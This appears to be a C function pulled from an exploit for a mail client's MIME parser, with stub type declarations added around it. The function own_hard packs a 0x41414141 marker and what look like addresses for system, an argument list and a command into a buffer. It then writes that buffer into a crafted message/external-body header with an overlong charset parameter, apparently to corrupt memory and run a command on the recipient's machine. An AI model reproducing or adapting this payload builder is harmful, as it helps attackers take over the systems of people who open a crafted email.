
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ mail ;
 int num (int) ;
 int sprintf (scalar_t__,char*,char*,int,char*) ;
 scalar_t__ strlen (scalar_t__) ;

void own_hard(int sys, int plist, int cmd, int dist, char *command) {
 char egg[1024];

 int *ptr = (int*)&egg[0];

 *ptr = 0x41414141;
 ptr++;
 *ptr = sys;
 ptr++;
 *ptr = plist;
 ptr++;
 *ptr = cmd;
 ptr++;
 *ptr = 0;


 sprintf(mail+strlen(mail),
  "Content-Type: message/external-body;\n"
  " access-type=\"%s\";\n"
  " charset*%u*=\"%s\";\n"
  "Content-Transfer-Encoding: 8bit\n"
  "--sorbo-rox--\n",
  command,num(dist), egg);

}
